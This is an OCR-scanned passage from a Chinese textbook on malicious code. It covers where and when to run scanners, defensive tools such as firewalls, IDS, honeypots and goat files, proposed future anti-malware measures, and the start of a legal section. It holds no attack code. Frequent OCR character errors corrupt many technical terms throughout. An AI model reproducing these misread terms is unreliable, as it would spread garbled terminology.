决定 所 要 运行 的 位 置 就 是 一 个 难题 了 。 亚 意 代 码 扫描 引擎 可 以 运行 在 台式 机 、 邮 件 服务 器 、 
文件 服务 器 和 Internet 边界 设备 上 上。 下面 是 一 些 在 部 署 恶意 代码 扫描 引擎 前 需要 考虑 的 
问题 。 

1. 何 时 进行 扫描 

如 果 在 一 个 文件 服务 器 或 台式 机 上 配置 了 扫描 软件 ,就 需要 做 出 一 个 何 时 扫描 文件 的 
决定 ,一般 有 以 下 几 种 。 

(1) 实时 扫描 因为 任何 原因 访问 到 的 文件 。 

(2) 定时 扫描 。 

(3) 按 需 扫描 。 

(3) 只 扫描 进入 的 新 文件 。 

很 多 扫描 程序 允许 扫描 因为 任何 原因 访问 文件 ,包括 进入 的 新 文件 .出 去 的 文件 .文件 
副本 打开 或 移动 的 文件 。 尽 管 这 是 最 安全 的 选择 ,但 扫描 所 有 因为 任何 理由 访问 到 的 文件 
会 造成 明显 的 性 能 下 降 。 曾 经 见 到 过 这 种 情况 , 当 恶 意 代码 扫描 引擎 启 动 了 这 个 功能 后 , 工 
作 站 的 性 能 因而 降低 了 300%。 一 次 又 一 次 扫描 同一 个 旧 的 应 用 程序 文件 ,每 一 次 程序 启 
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动 都 只 会 带 来 很 少 的 好 处 ,这 将 造成 明显 的 性 能 下 降 。 

一 些 管理 员 意 识 到 ,随时 扫描 所 有 的 文件 会 造成 性 能 大 幅度 的 下 降 , 取 而 代 之 的 是 定义 
如 每 个 周一 的 早上 对 所 有 的 文件 进行 扫描 。 如 果 全 体 最 终 用 户 不 会 介意 ,这 就 不 是 一 个 坏 
消息 。 可 是 ,很 多 用 户 不 愿意 在 他 们 使 用 计算 机 工作 前 等 待 30 分 钟 的 扫描 时 间 。 如 果 想 做 
定时 扫描, 最 好 选择 在 高 峰 时 间 以 外 的 时 候 进行 。 

男 外 一 些 管理 员 刚 好 走向 了 男 外 一 个 极端 方向 ,他 们 禁止 了 所 有 的 扫描 ,允许 用 户 决定 
何 时 开始 扫 摘 , 称 为 按 需 扫 摘 。 工 作 站 仅仅 是 在 需要 的 时 候 再 进行 检查 ,就 等 于 和 几乎 没有 
保护 一 样 。 依 赖 于 定时 扫描 或 按 需 扫描 都 会 使 得 新 的 感染 在 扫描 工作 之 间 发 生 , 这 并 不 是 
一 个 好 的 选择 。 

根据 经 验 , 按 预先 定义 的 文件 扩展 名 (或 全 部 文件 ) 对 进入 的 文件 扫描 ,将 是 一 个 最 好 的 
成 本 效益 比 的 选择 。 如 果 系 统 在 安 流 反 恶 意 代码 扫描 前 是 干净 的 ,就 只 需 扫 描 新 的 文件 。 
很 多 组 织 采 用 混合 的 方法 : 邮件 服务 器 扫描 所 有 进出 的 邮件 ; 文件 服务 器 扫描 所 有 预先 定 
义 文件 扩展 名 的 进入 文件 ; 在 非 高 峰 时 间 定 时 对 全 部 文件 进行 扫描 ; 使 用 的 工作 站 都 设置 
了 预先 定义 的 文件 类 型 的 实时 保护 。 这 种 混合 的 方法 工作 效果 良好 。 当 有 新 的 文件 类 型 引 
入 (如 .SHS 文 件 ) 时 ,应 当 及 时 把 新 的 文件 类 型 添加 到 默认 扫 摘 中 。 

2. 基于 Internet 的 扫描 

一 些 反 恶意 代码 公司 都 有 通过 Internet 发 布 到 PC 上 的 产品 ,如 McAfee 的 myCIO. 
com(http://www. mycio. com) 。 一 个 客户 端的 程序 安装 到 本 地 计算 机 上 ,但 是 更 新 、 报 告 
和 其 他 的 能 力 存储 到 Internet 上 上。 尽管 他 们 的 努力 局 得 了 好 评 , 但 其 产品 并 不 是 普通 台式 
机 客户 端的 蔡 代 品 ,它们 安装 扫描 过 于 缓慢 。 如 果 用 户 在 一 个 已 经 被 感染 了 的 计算 机 上 安 
装 它 们 ,很 可 能 会 有 混乱 情况 的 发 生 。 

3. 新 软件 加 入 到 系统 

很 多 应 用 软件 需要 在 安装 它们 以 前 禁止 恶意 代码 扫描 软件 。 如 果 建 议 这 样 做 或 
README 文件 提 到 了 这 些 问 题 ,请 按照 建议 办 。 当 然 , 这 给 了 恶意 代码 一 条 进入 系统 的 通 
道 。 除 非 建 议 中 明确 指出 关闭 保护 软件 或 经 历 了 很 多 次 的 安装 失败 ,否则 不 建议 关闭 保护 
程序 来 安装 一 个 新 的 软件 。 如 果 第 一 次 安装 过 后 新 的 程序 无 法 正常 工作 ,建议 印 载 它 , 然 后 
关闭 扫描 引擎 , 青 重新 安装 一 次 。 


12.5.4 额外 的 防御 工具 


不 能 仅仅 只 依 徘 恶 意 代码 扫描 引擎 就 希望 在 与 恶意 代码 的 “战斗 "中 取得 胜利 。 下 面 将 
介绍 一 些 其 他 工具 ,这 些 工 具 无 法 保证 拒 恶 意 代码 于 千里 之 外 ,但 是 却 可 以 加 强 系 统 的 安 
全 性 。 

1. 防火 墙 

对 于 任何 一 个 公司 或 任何 一 个 单独 接 入 Internet 的 PC 而 言 ,防火 墙 是 一 个 基本 的 防 
御 组 件 ,对 于 宽 市 连接 也 是 如 此 。 防 火 墙 在 它 最 基本 的 级 别 , 可 以 通过 段 口号 和 JIP 地 址 防 
范 网 络 通信 。 一 个 好 的 防火 墙 策 略 允 许 预 先 设 置 好 的 端口 打开 ,而 关闭 其 他 所 有 的 端口 。 
如 果 一 个 程序 ,如 木马 ,力图 通过 一 个 封闭 的 端口 建立 一 个 Internet 会 话 , 这 个 企图 不 会 成 
功 , 并 且 会 被 记录 在 案 。 更 重要 的 是 ,防火 墙 可 以 制止 黑客 对 网 络 或 PC 的 攻击 企图 和 


322 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


探测 。 

企业 应 该 考虑 那些 拥有 信誉 度 和 第 三 方 安全 组 织 ( 如 ICSA Labs) 推 荐 的 企业 级 的 防火 
墙 。 某 些 防 火 墙 是 基于 便 件 的 解决 方案 ,如 SonicWall 的 Internet Firewall Appliance 或 
Cisco PIX。 其 他 一 些 防 火 墙 ,如 Check Point 的 Firewall-1、Axent 的 Raptor Firewall 和 
Network Associates Gauntlet 等 都 是 基于 软件 的 。 

2. 入 侵 检 测 系 统 


人 入侵 检测 系统 (Intrusion Detection System,，IDS) 可 以 工作 在 两 种 方式 下 。 一 种 方式 是 
IDS 对 用 户 的 系统 进行 一 次 快照 ,并 报告 任何 试图 改变 被 监视 区 域 的 尝试 ; 另 一 种 方法 复 
杂 一 些 , 它 监视 PC 或 网 络 动态 寻找 恶意 行为 ( 称 为 “攻击 特征 ”)。 攻 击 特征 的 一 个 例子 是 
对 多 个 子 网 的 端口 扫描 。 与 防火 墙 一 样 ,IDS 能 够 对 一 个 单独 的 PC 或 企业 级 的 网 络 环境 
进行 安装 和 监视 。 在 保护 一 台 PC 时 , 它 可 能 会 监视 注册 表 的 变化 .局 动 区 域 的 变化 ,程序 
文件 的 变化 和 可 疑 的 网 络 活 动 。 网 络 IDS 监视 大 型 的 网 络 特定 的 事件 。 它 可 以 检测 针对 
一 个 特定 服务 需 的 拒绝 式 服务 的 攻击 特征 。 当 攻击 的 特征 被 发 现时 ,IDS 会 问 管 理 员 发 出 
一 个 关于 潜在 攻击 的 警告 。Internet Security Systems Cisco、Axent 和 Network Associates 
是 人 侵 检测 系统 方面 的 领导 者 。 

IDS 程序 还 有 两 个 问题 。 首 先 ,IDS 程序 需要 用 反 恶 意 代 码 扫 摘 引擎 定期 更 新 的 特征 
库 。 显 然 这 没有 ”" 逃 出 ? 反 恶 意 代 码 公 司 的 视线 ,它们 中 的 一 些 公司 正 在 开发 IDS 组 件 。 无 
论 如 何 , 开 发 一 个 反攻 击 的 特征 库 要 比 推出 一 套 恶意 代码 普通 字 节 集合 的 难度 要 高 得 多 。 
而 且 攻 击 站 点 可 以 有 多 种 绕 过 基于 网 络 的 IDS 程序 的 方法 。 其 次 ,基于 网 络 的 IDS 在 共享 
的 网 络 中 更 加 适用 。 为 了 让 IDS 可 以 识别 企业 级 的 攻击 , 它 必须 同时 对 多 个 网 段 进行 监 
视 , 并 检测 数据 包 。 在 今天 的 交换 网 络 和 加 密 通 信 中 ,IDS 程序 还 是 有 些 受 限 的 。 

3. 蜜 负 


“ 暑 钱 ”(honey pot) 是 一 个 很 有 趣 的 概念 。 它 们 的 前 提 是 用 户 的 网 络 终 究 会 被 黑客 侵 
入 。 蜜 钠 就 是 设计 用 来 模拟 看 起 来 正常 的 重要 服务 器 的 “ 假 ” 系 统 。 一 些 蜜 钠 会 保存 有 百 余 
份 看 起 来 很 可 信 的 讨论 一 个 虚假 的 重要 产品 的 邮件 和 文件 。 它 们 的 目标 是 易于 让 人 攻破 。 
密 摊 用户 的 目标 是 使 得 不 受 欢迎 的 黑客 将 他 们 的 时 间 花 费 在 蜜 钠 中 ,而 不 造成 任何 实际 上 
的 破坏 ,从 而 给 了 安全 管理 员 足 够 的 证 据 , 如 管理 员 可 以 发 现 黑客 是 如 何 操作 的 、 他 们 所 使 
用 的 工具 他们 试图 找寻 的 漏洞 是 什么 及 他 们 所 处 的 地 理 位 置 。 

蜜 饶 对 于 恶意 代码 防范 有 一 定 作 用 ,一 些 反 恶意 代码 公司 开始 使 用 类 似 密 饶 的 模拟 环 
境 来 诱骗 恶意 代码 。 反 恶意 代码 软件 把 可 疑 的 程序 放 到 一 个 模拟 的 环境 中 ,在 这 里 程序 可 
以 自由 地 操作 伪造 的 系统 资源 。 反 恶意 代码 程序 观察 它 所 做 的 一 切 , 如 果 发 现 恶意 行为 ,就 
会 向 用 户 报警 。 用 户 的 真实 环境 也 因为 模拟 蜜 饶 的 存在 而 不 受 影响 。 

4. 端口 监视 和 扫描 程序 

端口 监视 和 扫描 程序 是 防火 墙 的 一 个 简化 版 , 它 用 来 查找 活动 的 TCP/IP 端口 。 有 关 
“端口 扫描 程序 ”( 或 “端口 映射 器 ”) 在 Internet 上 有 很 多 的 类 似 软件 可 以 下 载 ,可 以 用 来 在 
特定 的 计算 机 上 或 整个 网 络 查找 活动 的 端口 。 用 户 一 般 提 交 一 个 目标 IP 地 址 或 地 址 范围 ， 
扫描 程序 就 开始 试探 从 1 到 1024, 甚 至 更 高 的 端口 进行 扫描 。 如 果 用 户 以 前 没有 用 过 端口 
扫描 程序 ,就 很 可 能 对 通信 中 所 使 用 的 未 知 端口 而 感到 吃惊 。 
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无 论 如 何 , 如 果 用 户 发 现 了 一 个 不 了 解 的 端口 ,就 需要 跟踪 使 用 它 的 程序 或 进程 。 端 口 
扫描 程序 可 以 告诉 用 户 计算 机 正在 使 用 端口 。 找 到 那 台 计算 机 并 启动 程序 来 了 解 哪些 进程 
或 程序 正在 使 用 特定 的 端口 。 对 于 端口 扫 摘 程序 而 言 , 比 较 难 指出 这 个 端口 起 源 于 哪个 文 
件 或 进程 。FPort 程序 是 一 款 功能 强大 的 端口 映射 检查 工具 ,使 用 它 能 把 端口 对 应 的 程序 
找 出 来 。 

sS。Jnternet 内 容 扫 描 程 序 


Internet 内 容 扫 描 程 序 (Internet Content Scanner) 是 男 外 的 恶意 代码 保护 工具 。 同 一 
般 的 基于 特征 数据 库 的 反 恶 意 代码 扫 摘 程序 不 同 的 是 ,内 容 扫 摘 程序 是 寻找 恶意 代码 的 行 
为 。 最 复杂 的 产品 对 于 所 有 的 Internet 下 载 的 代码 都 提供 “ 沙 箱 ” 一 样 的 安全 保护 ,并 提供 
模拟 的 “ 蜜 缸 ?环境 ,不 仅仅 只 是 Java applet 被 放 到 沙 箱 里 ,ActiveX 控件 、VBScript 文件 和 
可 执行 文件 也 是 如 此 。 

Internet 内 容 检查 需 在 保护 用 户 不 受 源 于 HTML 的 恶意 代码 伤害 的 问题 上 的 成 效 是 
不 错 的 ,但 是 无 法 取代 反 恶 意 代码 扫描 引擎 的 作用 。 事 实 上 , 绝 大 多 数 的 内 容 检 查 硕 无 法 检 
测 所 有 的 已 知 恶 意 代 码 。 如 果 用 户 用 了 一 个 不 是 来 自 反 恶意 代码 广 商 的 内 容 扫 摘 程序 , 建 
议 最 好 也 运行 一 个 反 恶 意 代 码 扫 描 程 序 。 一 些 广 商 正 在 把 Internet 内 容 扫描 引擎 和 它们 的 
反 恶 意 代 码 扫 摘 程 序 相互 连接 ,这 些 厂 家 包括 Trend Micro Network Associates 和 eSafe。 

6. 其 他 工具 

除了 上 述 工具 外 ,还 有 很 多 工具 可 以 帮助 检测 和 阻止 恶意 代码 攻击 。 下 面 列 举 其 中 的 


ts 


IE 


(1) SmartWhois2 指 一 个 实用 的 网 络 信 息 工 具 。 如 果 用 户 有 IP 地址、 主机 名 或 域名 ， 
就 可 以 使 用 SmartWhois 从 公众 信息 中 来 查找 这 个 连接 的 详细 情况 ,包括 国家 、 州 或 省 、 城 
市 、 网 络 供应 方 、 网 络 管理 员 和 技术 文 持 联系 信息 。Tamos Soft 也 提供 了 一 个 很 优秀 的 
NetBIOS 扫描 程序 : NBScan 要 比 NBTSTAT. EXE 的 用 户 界面 更 加 友好 一 些 。 

(2) 程序 锁定 : 市 场 上 有 很 多 的 工具 可 以 帮助 管理 员 控 制 哪些 程序 何 时 在 机 器 上 开始 
运行 。SmartLine 公司 的 Advanced Security Control (http://www. protect-me. com/asc) 
就 是 这 样 的 产品 。 尽 管 Windows NT 可 以 自己 通过 严格 的 策略 文件 进行 锁定 ,但 ASC 可 
以 让 一 个 孩子 做 到 这 一 点 。 管 理 员 可 以 预测 哪些 程序 何 时 、 何 地 会 运行 。 未 验证 的 用 户 将 
被 禁止 在 移动 磁盘 、RAM 磁盘 、 ZIP 磁盘 上 执行 程序 ,并 且 人 允许 进入 命令 界面 ,如 Telnet。 

(3) 替罪羊 文件 : 就 像 圣 经 中 被 献 祭 的 山羊 一 样 “和 蔡 罪 羊 ? 文 件 (goat file) 是 用 来 为 好 
的 文件 做 伪装 的 。 真 正 的 替罪羊 文件 是 空白 的 、 等 着 捕捉 一 个 干净 的 恶意 代码 副本 的 
.COM 和 .EXE 文件 。 蔡 罪 羊 文件 是 在 通 稼 的 登录 脚本 中 配置 的 文件 ,如 果 有 人 引发 了 恶 
意 代码 感染 ,替罪羊 文件 就 会 被 感染 。 有 一 个 人 侵 检 测 软 件 或 反 恶 意 代码 检查 比较 程序 监 
视 蔡 罪 羊 文件 的 活动 ,并 防止 其 被 修改 。 如 果 有 恶意 代码 试图 修改 文件 ,很 快 就 会 有 警报 发 
出 ,而 且 最 早 被 感染 了 的 文件 就 会 有 希望 很 快 找到 。 

7. 良好 的 备份 


没有 什么 可 以 比 良 好 的 备份 更 好 的 了 。 没 有 任何 防御 计划 是 完美 的 ,而 且 在 很 多 组 织 


http://www. tamos. cn/ content/products/smartwhois/ 。 
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中 恶意 传播 代码 有 时 会 攻破 最 新 的 防御 。 如 果 恶 意 传播 代码 攻击 并 造成 了 无 法 修复 的 破 
坏 ,而 用 户 又 有 好 的 备份 ,就 可 以 保证 将 它 的 损失 降 到 最 低 。 如 果 无 法 确认 备份 的 可 徘 性 ， 
那 就 值得 忧虑 了 。 


12.6 未 来 的 防范 措施 


真正 防止 恶意 代码 传播 的 措施 不 是 恶意 代码 防范 程序 和 防范 计划 ,而 是 致力 于 建立 安 
全 的 操作 系统 ,加 强 职 责 和 减少 默认 的 功能 。 但 是 ,这 些 措施 需要 对 大 量 的 结构 重新 设计 ， 
且 不 可 能 在 短期 内 进行 广泛 的 配置 。 下 面 是 一 些 阻 止 恶意 代码 传播 的 防范 措施 。 

(1) 审核 所 有 的 代码 。 

(2) 最 终 的 认证 。 

(3) 更 安全 的 操作 系统 /应 用 程序 。 

(4) 防止 未 授权 的 代码 被 算 改 。 

(5) ISP 扫描 。 

(6) 仅 允 许 执 行 已 提交 的 内 容 。 

(7) 国家 安全 组 织 。 

(8) 更 严厉 的 惩罚 。 

1. 审核 所 有 代码 

安全 专家 一 直 在 强调 不 运行 不 可 信 代 码 的 重要 性 。 最 理想 的 情况 是 ,每 行 代 码 都 没有 
恶意 或 弱点 ,代码 才 可 信 。 但 是 ,很 多 公司 都 没有 这 个 资源 或 时 间 来 修订 所 有 引入 的 代码 。 
因此 ,大 多 数 公 司 试图 从 可 徘 的 资源 上 运行 代码 。 但 是 能 信任 这 些 可 徘 资 源 吗 ? 现 有 的 可 
利用 代码 原本 并 没有 恶意 。 制 造 商 既 没有 资源 来 正确 地 审核 他 们 上 自己 的 代码 ,也 想象 不 到 
他 们 的 代码 被 滥用 ,甚至 想当然 地 认为 消费 者 能 容忍 将 来 可 能 会 遇 到 的 不 便 。 更 糟糕 的 是 ， 
发 现 一 年 中 总 有 这 么 好 几 次 ,从 可 靠 的 提供 商 那 里 得 到 的 大 型 知名 程序 中 隐藏 着 漏洞 和 故 
意 的 编码 缺陷 ,甚至 不 能 信任 自己 应 该 信任 的 广 商 。 

理想 的 情况 是 ,第 三 方 评定 人 员 用 可 徘 的 审核 技术 检查 所 有 可 利用 的 代码 ,看 代码 能 否 
通过 审核 。 审 核 过 程 将 查找 缓存 溢出 、 隐 藏 的 后 门 .编码 弱点 和 可 用 的 第 三 方 交 互 。 所 有 通 
过 审核 的 代码 都 有 统一 的 标签 来 证 明 它 的 安全 性 。 公 司 只 能 运行 封装 好 的 通过 审核 的 代 
码 。 然 而 这 个 过 程 太 凡 烦 ,几乎 不 可 能 实现 。 作 为 第 三 方 的 评定 者 的 黑客 也 对 代码 进行 月 
我 检测 。 合 法 的 第 三 方 评定 将 减 慢 编码 过 程 ,增加 最 终 用 户 的 成 本 。 消 费 者 也 不 愿意 等 待 
并 花费 更 多 的 钱 。 

2. 最 终 的 认证 

匿名 服务 是 恶意 代码 编写 者 的 保护 全。 如 果 建 立 了 Internet 连接 ,或 者 有 内 骨 职 责 的 
分 布 式 程序 ,那么 它 能 对 代码 作者 进行 认定 并 确保 所 写 的 代码 在 作者 和 执行 人 员 之 间 没 有 
被 改变 。 这 是 微软 认证 代码 的 梦想 。 但 是 , 它 没 有 很 好 地 被 遵循 ,使 现在 的 应 用 失效 。 相 信 
大 多 数 人 都 有 一 个 默认 的 网 络 系统 ,可 跟踪 每 一 封 E-mail 和 每 一 个 程序 的 来 源 。 可 能 这 就 
意味 着 用 集中 的 认证 中 枢 和 注册 所 有 发 布 的 代码 和 E-mail 客户 。 在 E-mail 发 送 或 程序 上 传 
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之 前 ,都 要 经 过 某 种 认证 过 程 。Internet 上 的 每 一 个 数据 包 最 终 能 跟踪 到 它 的 发 送 者 。 

并 不 是 说 在 Internet 上 或 在 计算 机 上 不 应 该 匿名 ,而 是 应 该 提供 匿名 网 络 , 从 而 使 用 户 
能 隐藏 在 屏幕 名 称 的 后 面 , 发 布 程序 代码 而 不 用 害怕 受到 报复 。 很 多 人 , 像 艾 滋 病 患者 和 追 
求 浪漫 的 人 ,需要 不 暴露 身份 地 进行 交流 。 一 定 要 采取 阻止 广告 商 和 其 他 人 跟踪 个 人 的 每 
一 个 变化 。 如 果 不 想 接收 匿名 信 或 不 可 跟踪 程序 (大 多 数 用 户 都 有 这 种 想法 ) ,最 终 的 职责 
事实 上 阻止 了 恶意 代码 ,阻止 了 伪装 的 E-mail, 防 止 了 欺骗 性 的 网 上 商业 行为 ,在 防止 垃圾 
邮件 的 同时 阻止 不 可 知 的 黑客 攻击 。 在 军事 领域 里 存在 两 个 网 络 , 即 安全 的 和 不 安全 的 。 
不 安全 网 络 上 的 信息 不 允许 进入 安全 网 络 。 人 们 能 自由 地 在 任何 一 个 网 页 上 浏览 ,接受 相 
应 的 风险 ,但 至 少 允 许 选择 是 否 匿名 交流 。 

Internet 已 经 有 工具 使 用 户 达 到 这 个 目的 ,如 密码 学 、IPv6 和 数字 认证 。 用 户 仅 需要 把 
网 络 交流 分 成 两 种 类 型 : 安全 的 和 不 安全 的 。 标 准 化 机 构 一 般 接受 使 用 工具 来 改良 整个 社 
会 的 方式 。 说 起 来 容易 做 起 来 难 。 每 一 个 软件 和 系统 网 络 工具 都 不 得 不 重新 设计 以 支持 新 
的 安全 结构 。 这 次 通过 之 后 ,高 级 的 黑客 会 尝试 攻击 认证 机 制 。 然 而 ,发 现 的 任何 漏洞 都 会 
很 快 被 修复 ,以 保护 参与 的 用 户 不 受 任何 未 知 的 恶意 攻击 。 在 今天 默认 匿名 的 领域 里 ,因为 
不 能 解决 这 个 问题 ,开发 人 员 就 必须 修复 几 百 个 漏洞 。 

3. 更 安全 的 应 用 程序 


使 计算 机 安全 专家 和 反 恶 意 代 码 开发 者 都 感到 失望 的 是 提供 商 愿 意 以 牺牲 安全 性 为 代 
价 来 增加 默认 功能 。Internet 和 Windows 就 是 这 样 的 例子 : 很 多 网 络 协议 允许 匿名 交流 。 
大 多 数 SMTP 邮件 服务 器 会 发 送 任何 人 的 E-mail, 无 论 发 送 者 的 邮件 地 址 是 否 合法 ,或 者 
是 否 来 源 于 网 络 内 部 。FTP 和 WWW 功能 也 是 基于 匿名 数据 的 传送 。 微 软 有 许多 已 发 布 
的 可 利用 代码 ,还 没有 受到 安全 测试 。Windows 脚本 主机 、VBScript 和 Office 宏 语 言 是 他 
们 允许 本 地 系统 管理 的 几 种 较 易 使 用 的 技术 。 许 多 Windows 计算 机 可 以 具备 更 蝇 健 的 默 
认 安 全 设置 ,但 他 们 宁愿 以 牺牲 安全 性 为 代价 提高 其 他 功能 。 

就 像 Java 一 样 ,更 多 的 默认 安全 选项 从 一 开始 就 可 以 构建 一 种 语言 一 个 应 用 ,或 者 一 
个 操作 系统 。Java 开发 者 理解 他 们 语言 的 潜在 后 果 , 为 了 安全 起 见 , 他 们 在 减少 语言 的 既 
定 功能 方面 迈 出 了 勇敢 的 一 步 , 他 们 为 此 备 受 指责 。 尽 管 如 此 , 仍 有 未 签名 的 Java 恶意 代 
码 或 蠕虫 曾经 广泛 传播 过 。 签 名 的 Word 宏 或 ActiveX 控件 仍 有 许多 安全 隐患 。 它 们 的 黑 
日 模型 表明 一 旦 同意 该 对 象 运行 , 就 可 以 对 用 户 的 系统 做 它 想 做 的 任何 事情 。 但 很 少 有 人 
知道 这 些 代 码 会 做 些 什 么 。Java 在 默认 的 安全 模型 通过 允许 用 户 查看 签名 的 applet 权限 
而 提供 帮助 。 因 此 ,用 户 需 要 更 多 的 像 Java 这 样 的 安全 沙 箱 机 制 。 

每 次 一 种 新 的 应 用 程序 或 操作 系统 发 布 时 ,安全 专家 都 要 请 求 销 售 商 制定 更 多 的 默认 
安全 措施 。 但 由 于 安全 宕 要 人 花费 时 间 和 金钱 ,因此 用 户 宁 愿 承担 这 种 冒险 。 对 许多 人 来 说 ， 
终 闫 用户 接受 珊 有 bug 的 软件 .乏味 的 安装 过 程 , 以 及 由 于 恶意 性 代码 而 造成 几 天 的 停工 
损失 , 却 不 去 追究 销售 商 的 责任 ,这 是 不 合理 的 事情 。 

4. 阻止 未 授权 的 代码 被 算 改 

所 有 恶意 代码 均 以 某 种 方式 操纵 本 地 系统 ,或 者 是 通过 修改 操作 系统 文件 ,或 者 是 修改 
应 用 文件 。 这 种 修改 要 么 以 未 授权 的 方式 使 用 操作 系统 ,要 么 在 目 动 启动 区 中 日 动 执行 。 
在 阻止 恶意 性 代码 修改 本 地 系统 方面 ,开发 人 员 还 有 许多 工作 要 做 。 例 如 ,如 果 一 个 程序 将 


326 计算 机 病毒 与 恶意 代码 一 一 原理 技术 及 防范 (第 4 版 ) 


要 把 自己 置 于 用 户 的 AUTOEXEC. BAT 文件 或 注册 表 自 动 启动 区 ,就 应 该 强制 性 提示 用 
户 。 现 在 ,程序 在 修改 之 前 仅 会 请 求 用 户 的 允许 。 

除非 是 经 过 中 央 管 理 进 程 的 允许 ,否则 禁止 改变 任何 应 用 程序 或 操作 系统 。Windows 
的 系统 文件 检查 器 和 文件 保护 器 上 实现 了 这 种 管理 进程 。 所 有 的 程序 都 将 被 署名 , 当 未 署 
名 的 程序 要 求 修改 文件 时 ,操作 系统 将 拒绝 修改 或 恢复 做 过 的 修改 。 但 是 ,微软 的 这 种 努力 
非常 脆弱 , 它 很 容易 被 绕 过 ,而 且 给 一 些 合法 的 程序 和 升级 带 来 问题 。 

研究 者 曾 把 检查 不 必要 文件 修改 操作 的 程序 或 操作 系统 称 为 代码 完整 性 检查 颖 (code 
integrity chechers，CRC) 。 早 期 的 CRC 只 在 文件 被 修改 后 才 检 测 出 代码 已 被 算 改 。 现 代 
的 CRC 则 在 文件 被 修改 之 前 首先 检查 代码 完整 性 。 问 题 在 于 如 何 确定 一 个 修改 是 否 合适 。 
询问 用 户 接受 或 拒绝 修改 对 很 多 恶意 性 代码 来 说 无 济 于 事 。 在 实际 改变 之 前 征求 销售 商 这 
一 招 或 许 管用 。 所 有 的 修改 都 要 经 过 销售 商 的 注册 或 销售 商 的 信任 。 销 售 商 根据 他 们 的 标 
准 来 证 实 代 码 是 完好 的 。 但 是 ,这 个 过 程 非 常 烦 琐 , 一 些小 的 软件 公司 可 能 负担 不 起 ,因此 
也 就 阻碍 了 大 多 数 合法 代码 的 生产 。 

5.ISP 扫描 

允许 Internet 服务 商 扫 描 恶 意 代码 或 特洛伊 木马 是 有 意义 的 。 如 果 大 多 数 恶 意 性 代码 是 
通过 网 络 传播 的 ,那么 在 它们 被 下 载 之 前 就 截获 它们 也 是 一 种 办 法 。 如 果 爱 虫 病毒 的 变种 被 
发 布 ,ISP 可 以 在 其 传播 之 前 就 截获 它 。 目 前 有 几 个 具有 反 恶 意 代码 扫描 服务 的 ISP 正在 运行 
之 中 。 一 些 销售 商 正 致力 于 载波 类 方法 ,该 方法 可 以 用 于 处 理 ISP 的 可 测量 性 问题 。 

例如 ,Messaging Securityd 运行 了 一 个 可 以 扫描 所 有 收 到 的 发 送 的 SMTP 信件 中 的 恶 
意 代码 的 Internet 邮件 服务 。 通 过 使 用 3 个 商业 反 恶 意 代 码 方案 ,再 加 上 一 个 他 们 自己 的 
引擎 ,他 们 每 月 能 成 功 地 拦截 或 清除 上 千 种 恶意 代码 。 由 于 很 少 有 亚 意 性 代码 能 绕 过 他 们 
的 产品 ,他 们 的 客户 相 比 之 下 能 得 到 更 安全 的 邮件 。 

但 是 ,即使 不 考虑 基于 ISP 扫描 技术 的 性 能 问题 和 成 本 ,该 方案 也 存在 许多 的 问题 。 第 
一 ,基于 Internet 的 扫描 技术 与 其 他 恶意 代码 扫描 方法 一 样 都 存在 固有 问题 。 所 以 ,虽然 该 
技术 是 一 个 好 办 法 ,但 却 不 能 作为 唯一 的 防范 措施 。 第 二 , 随 痢 越 来 越 多 的 Internet 数据 流 
被 加 密 ,Messaging Security 这 样 的 办 法 将 会 越 来 越 难 , 除 非 把 客户 的 密 钥 告诉 扫描 程序 开 
发 商 ( 这 并 不 是 件 轻松 的 事情 )。 每 一 个 网 络 传输 协议 都 需要 一 大 块 程 序 来 检测 恶意 性 代 
码 。Messaging Security 检测 SMTP 数据 流 , 同 时 使 用 十 几 种 其 他 的 协议 。 辅 助 一 个 完整 
的 ISP 方案 必须 包括 检测 HTTP、FTP、IM 及 其 他 数 百 种 协议 的 程序 。 另 外 ,除了 Internet 
之 外 , 晋 意 代 码 还 可 以 通过 其 他 途径 进入 网 络 , 且 本 地 用 户 也 能 带 来 恶意 代码 ,并 通过 公司 
的 远程 拨号 服务 右上 传 ,或 者 通过 销售 商 和 合作 伙伴 的 软件 传播 。 尽 管 如 此 ,由 于 大 多 数 新 
的 恶意 性 代码 都 是 通过 Internet 传播 的 ,ISP 扫描 技术 还 是 可 以 大 大 减少 恶意 性 代码 的 
传播 。 

6. 只 允许 执行 许可 内 容 

男 外 ,一 个 可 行 的 办 法 是 只 允许 预先 认可 的 内 容 和 程序 进入 计算 机 或 公司 网 络 。 但 由 
谁 来 认可 ,怎样 认可 ,以 及 如 何 实现 仍 是 个 问题 。 一 些 工 具 能 有 限 地 实现 这 些 功 能 ,但 却 没 
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有 一 个 通用 的 标准 适用 于 全 世界 的 计算 机 ,可 用 的 办 法 都 难以 管理 并 且 代 价 昂 贯 。 

7. 国家 安全 组 织 

加 强 Internet 安全 需要 政府 的 介入 。 许 多 人 不 相信 政府 可 以 实现 有 效 的 安全 管理 ,或 
者 他 们 不 信任 政府 。 他 们 认为 政府 管制 对 于 设置 安全 标准 和 保护 基础 设施 是 必需 的 。 政 府 
的 行政 命令 办 法 和 程序 确实 可 以 加 强 Internet 安全 并 使 其 成 为 一 个 更 好 的 工作 和 娱乐 的 地 
方 。 正 如 在 DES 中 所 做 的 一 样 ,政府 至 少 可 以 制定 一 个 安全 标准 并 要 求 所 有 的 商业 网 站 
遵守 。 

8. 更 严 历 的 惩罚 

被 确认 的 恶意 代码 编写 者 应 该 受到 更 严厉 的 惩罚 ,应 该 判 以 重 刑 。 这 个 办 法 已 经 开始 
使 用 。 在 1970 年 到 1980 年 之 间 ,就 有 被 逮 住 的 年 轻 黑 客 为 他 们 的 黑客 行为 坐牢 而 后 悔 不 
已 。 法 律 部 门 越 来 越 善 于 跟踪 黑客 犯罪 ,并 把 青少年 同 成 年 人 一 样 看 符 。 少 数 的 黑客 得 到 
重 罚 可 以 次 示 其 他 的 恶意 代码 编写 者 。 

总 之 ,用 户 在 日 己 的 计算 机 环境 中 使 用 这 些 办 法 确实 可 以 减少 被 * 黑 ”的 危险 。 当 前 计 
算 机 社会 需要 这 些 安全 措施 。 国 际 间 的 基础 设施 投入 使 用 之 前 ,开发 人 员 必 须 开发 可 行 的 
防范 计划 来 使 大 量 恶意 代码 对 计算 机 和 网 络 的 破坏 达到 最 小 程度 。 


12.7 ”恶意 代码 犯 排 相关 法 律 法 规 基 础 


针对 大 批 的 计算 机 安全 问题 ,世界 各 个 国家 和 地 区 都 制定 了 相应 的 法 律 法 规 。 这 些 法 
律 明 确 规定 故意 使 用 恶意 代码 造成 损失 属于 犯罪 行为 。 如 果 制 造 或 传播 恶意 代码 ,并 且 造 
